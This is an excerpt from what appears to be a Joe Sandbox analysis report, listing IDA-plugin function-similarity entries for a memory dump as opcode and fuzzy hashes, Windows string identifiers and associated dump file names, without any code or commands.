                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                      • API String ID: 0-996340685
                                                      • Opcode ID: 544e7bf8a7ade01d2e882ff2425b546c394fc583ae0cd7b1fbe44cf8a5a22c34
                                                      • Instruction ID: a01b038f232e1fb43bc283ec757f2e14b8aab76befc97ec88682ba90458ff28b
                                                      • Opcode Fuzzy Hash: 544e7bf8a7ade01d2e882ff2425b546c394fc583ae0cd7b1fbe44cf8a5a22c34
                                                      • Instruction Fuzzy Hash: D3417B75A0074AAAD725DFB4C8406EBB7F4BF19310F00482AD6AAD7240E774A645CFA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Flst
                                                      • API String ID: 0-2374792617
                                                      • Opcode ID: 1a89ff88e6507259a1462c3643047ba7e9020c742c2b6047c03f5dbe0d109b05
                                                      • Instruction ID: 99c0c1b4c19ea41294469f047793f26a50caa5a5a80542a95e089b46747c1972
                                                      • Opcode Fuzzy Hash: 1a89ff88e6507259a1462c3643047ba7e9020c742c2b6047c03f5dbe0d109b05
                                                      • Instruction Fuzzy Hash: 884166B9606301DFE304CF19C480A16BBE4EF6A761F58856EE4598B241DB71E942CBD2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: L4QwL4Qw
                                                      • API String ID: 3446177414-1417497668
                                                      • Opcode ID: 66438dc0e8483f46883c0976173e2781148aefc4b5142ad305f0b9332d22c58c
                                                      • Instruction ID: 9779ffd82215694c903e39437719aebe28146f681ce1a8afec9b4709def89139
                                                      • Opcode Fuzzy Hash: 66438dc0e8483f46883c0976173e2781148aefc4b5142ad305f0b9332d22c58c
                                                      • Instruction Fuzzy Hash: F121D476A00710AFD3229F58C900B1A7BB5FBA8B60F110429E955DF740DB36EC01CFA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: f1100c380eb26211646eef35bf07accf54e2897ba2e680ac0f206e9c2e7e6800
                                                      • Instruction ID: a60310292fff1d772b1f7d3f79a934e5921e6845088af9569a0d3b94920ad2a9
                                                      • Opcode Fuzzy Hash: f1100c380eb26211646eef35bf07accf54e2897ba2e680ac0f206e9c2e7e6800
                                                      • Instruction Fuzzy Hash: A3117FF4306706AFFB144D198C50F2A7395BBB2274F30852AE551CB291FA72E8418BA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrCreateEnclave
                                                      • API String ID: 0-3262589265
                                                      • Opcode ID: f0431cb7ef3583e610a1d4bdd7c66840660cb40ac1a7a22fcdad55dfe49122f1
                                                      • Instruction ID: f76b81ed37b2b648cd1922469cd5c97cf3472eb1f109b399b595d764be2edda3
                                                      • Opcode Fuzzy Hash: f0431cb7ef3583e610a1d4bdd7c66840660cb40ac1a7a22fcdad55dfe49122f1
                                                      • Instruction Fuzzy Hash: AE2123B1908344ABC310CF2AD804A4BFBE8ABE5B10F004A1EF5A096250DBB5D405CF92
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ad2d0857e12e27737f12ca50907d83b29197d68dad5c0754793d7cf09541dc8
                                                      • Instruction ID: 29f35e76bb9297c78d35508620c6d9e0abee4bbb865a72cc63c772a074d4733f
                                                      • Opcode Fuzzy Hash: 5ad2d0857e12e27737f12ca50907d83b29197d68dad5c0754793d7cf09541dc8
                                                      • Instruction Fuzzy Hash: 45428D75A006168FDB09CF69C880AAEB7F2FF98374F54856DD555AB340DB34E842CB90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: baecc9eaeb9b4117477ae4cc61eb468edaf5ee5a8b177707a318c788c2d1716d
                                                      • Instruction ID: 95e76eb961faa6f32255be29f074fb63a3333b92ab48249780e0162ab993b692
                                                      • Opcode Fuzzy Hash: baecc9eaeb9b4117477ae4cc61eb468edaf5ee5a8b177707a318c788c2d1716d
                                                      • Instruction Fuzzy Hash: 3432ADB5E012199FDB14CFACC884BAEBBB1FF64754F140129E805AB380E735A981DF91
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 743a147a2d5f14c30a1b4f5800e118845f5a80c012196b55978479d692b36435
                                                      • Instruction ID: 3d5bc9bc4e4ca5997744971b1794ae9dc5b71d969703b361fe6bed4fa1021232
                                                      • Opcode Fuzzy Hash: 743a147a2d5f14c30a1b4f5800e118845f5a80c012196b55978479d692b36435
                                                      • Instruction Fuzzy Hash: 4E22AFB9E002168FDB09CF58C4D0AAAF7B2FF99324F54856DD8559B344EB34E942CB90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61274186de86eb3a160ad969f106594088b1d5b76db79b15d10a30e4ecbfcaee
                                                      • Instruction ID: c6bdbfbddbfa782f1f157714c492e95f371e03a223990c526cba01f78b429aef
                                                      • Opcode Fuzzy Hash: 61274186de86eb3a160ad969f106594088b1d5b76db79b15d10a30e4ecbfcaee
                                                      • Instruction Fuzzy Hash: 88C1B4B5E00219AFEB14CF58CC44BAEB7B5EF64368F248269D915AB380D774E941CF90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c92a5e8454f493897ffa35b9ebc53ac82b14a45662b59100e13bf944bdf40d4a
                                                      • Instruction ID: 8b5bb74eb387eb516f6003b6587e401c976f4b40c93db94ca9c60ab3a2160086
                                                      • Opcode Fuzzy Hash: c92a5e8454f493897ffa35b9ebc53ac82b14a45662b59100e13bf944bdf40d4a
                                                      • Instruction Fuzzy Hash: 7FC145B5B02314CFEB04CF18C4A0BB977A1FF64764F1542A9E845EB3A2EB349951CB90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4223880d31d97dc7a23530364a6ac04bda11475a8a6ae4bf251edcad21ca150f
                                                      • Instruction ID: a2927f6f400850fb46ba0348aa8f98e8a31c887eb821b6f9808c4edb8b919df7
                                                      • Opcode Fuzzy Hash: 4223880d31d97dc7a23530364a6ac04bda11475a8a6ae4bf251edcad21ca150f
                                                      • Instruction Fuzzy Hash: 62A16C71900619AFEB12CF68CC45FAE3BB9EF59764F410054FA10BB2A0D779AC51CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                      • Instruction ID: 83a647f1b4d898491d4d77270b4aac7a21dd3630d0f3f6fccc28b9fd793631f6
                                                      • Opcode Fuzzy Hash: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                                      • Instruction Fuzzy Hash: CEA13279610605DFDB64CF1CC480A1ABBF6FFA8360F24856AD15A8B661E770ED81CF80
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b1c3d7f452715bec07fb222d8af8c3f006230e767bbb5e61b18e61de8d8499a
                                                      • Instruction ID: ca33891531224b5efa8c4fa1b1cf2b2f01449c13fb28624f200ee2184c78380a
                                                      • Opcode Fuzzy Hash: 6b1c3d7f452715bec07fb222d8af8c3f006230e767bbb5e61b18e61de8d8499a
                                                      • Instruction Fuzzy Hash: 92B162B8904305EFDB15CF19D881BA977B0FB68364F5045AAD829EB291DB39D843CF90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                      • Instruction ID: 9cc4c5738a83da9f58bc0c168b4ffce128dd0581ff0f5e16c705b818897988f0
                                                      • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                      • Instruction Fuzzy Hash: BD718279A0021A9BDF20CE6DC890ABEBBF5AF64750F55415AE810EB341E734ED45CF90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                      • Instruction ID: ad5b50638515ea3bbde74d4725af1372e1825e7a9e938926598063a870ba1dbe
                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                      • Instruction Fuzzy Hash: 1081B07AE00219DFEF14CF68C8887ADF7B2FFA4359F54412ACA15B7344DA35A9408B91
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                      • Instruction ID: 475696a38ecb47f547667baec1183090e380387e5a1396980ce489331572ab62
                                                      • Opcode Fuzzy Hash: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                      • Instruction Fuzzy Hash: 1B819B74A00745AFDB15CF68C980BAABBF5FF58310F10856AE956C7351D734E984CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb4c0ac3c9b1e7f3415d8963f75d05bc6ed9c0f21aa69ed740eee7f09afeef3f
                                                      • Instruction ID: b91c1b84fe326da038d3dd607b7011f7d9917b63172ba86e638787d5021a20a0
                                                      • Opcode Fuzzy Hash: bb4c0ac3c9b1e7f3415d8963f75d05bc6ed9c0f21aa69ed740eee7f09afeef3f
                                                      • Instruction Fuzzy Hash: A1716C75A00628AFDB11DFA8C880FAEB7B5FF6A750F544015EC50AB660D735EC42CBA1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ed85f3809be667c56067ceaf0dd2efc528d6eb7a690be37c29ec494c8167676
                                                      • Instruction ID: 1c6f8d5b2f8fac35268815f37b77d0c5d28b9c5bf77bbeb2712dfbf41426585e
                                                      • Opcode Fuzzy Hash: 2ed85f3809be667c56067ceaf0dd2efc528d6eb7a690be37c29ec494c8167676
                                                      • Instruction Fuzzy Hash: 97814AB5A00206DFDB09CFA8C490AAABBF1FF58310F1581A9D859EB351D734EA51CB90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a818435f9c7d2a51d153d53bc7f88c07a0472038af82ddd6a8ee12f7813feef
                                                      • Instruction ID: 1593fe373f3d563939edff7d098914dcd48da2830df6c1b7113f1973e9171cc2
                                                      • Opcode Fuzzy Hash: 7a818435f9c7d2a51d153d53bc7f88c07a0472038af82ddd6a8ee12f7813feef
                                                      • Instruction Fuzzy Hash: 8361C4B5200716AFD711CF69C884BABFBA9FF68750F014659F8A887240DB34E516CF91
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ecd95ffdaaefad5cc36037f1e3a49e7f97cd81380a6acd418e19d8592670a7c4
                                                      • Instruction ID: d59a7e98c5be1c8179731cc4a8d2e6f2e4a98b9bc820cb06fafa967146f0c633
                                                      • Opcode Fuzzy Hash: ecd95ffdaaefad5cc36037f1e3a49e7f97cd81380a6acd418e19d8592670a7c4
                                                      • Instruction Fuzzy Hash: 8061E5752047438FD301CF68C494B6AF7E0BFA0724F1544ADE8A58B691DB79E907CB82
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 674705740f6244b039443477504ad0267e6e4ae3872e0d7d7eeaa7e4c2430f36
                                                      • Instruction ID: 0e55d9c8d1dccb57a7041ccbc59956f019442c8517c0734b9a87e1947036c95c
                                                      • Opcode Fuzzy Hash: 674705740f6244b039443477504ad0267e6e4ae3872e0d7d7eeaa7e4c2430f36
                                                      • Instruction Fuzzy Hash: 89519E726083019FDB84DF2CD840A6BB7E5EBA8364F55893DF869C7240E774E805CB92
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                      • Instruction ID: 1370109ee61aacf1c9d2e5ed1321dcc9a556944e05c3add790c82017f713aaf3
                                                      • Opcode Fuzzy Hash: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                      • Instruction Fuzzy Hash: B8510E7950021A9ADF24DF59C890ABFB7F5BFA0794F50405EE8659B300EB35E983C7A0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                      • Instruction ID: c9b656b7c321562f1b11a1f36442c6d74aa36862dbf44e8714461f675ad64c83
                                                      • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                      • Instruction Fuzzy Hash: 2A5128BA6003829FDB009F648C40A7B77E5EFA42D8F404429F956EB250EB34D855CBF2
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee0d2dfe20de6b9ef5461c8c7d9b30ec1bb7338274b26848bc939a2c9471c05a
                                                      • Instruction ID: 4add7282354c2cd6783f7caa8641f8992eed066d42113053c051eca970f9191c
                                                      • Opcode Fuzzy Hash: ee0d2dfe20de6b9ef5461c8c7d9b30ec1bb7338274b26848bc939a2c9471c05a
                                                      • Instruction Fuzzy Hash: B651B3B15052449FE320DF68CC81F5A7BE8EF64764F50062DF92697291DB38D891CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9863828398593e5ca835d9febc04e1df079be6132f90b1a75494b9fa0a8a4aa
                                                      • Instruction ID: 0eda2c63c777870af05b800171397b76d6cf267d8f9a48d05125cb37db50b5b2
                                                      • Opcode Fuzzy Hash: c9863828398593e5ca835d9febc04e1df079be6132f90b1a75494b9fa0a8a4aa
                                                      • Instruction Fuzzy Hash: 50414571240600EFE7159F2CDE80B267BEAEF54760F11842AE928DB760DB35EC018F90
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
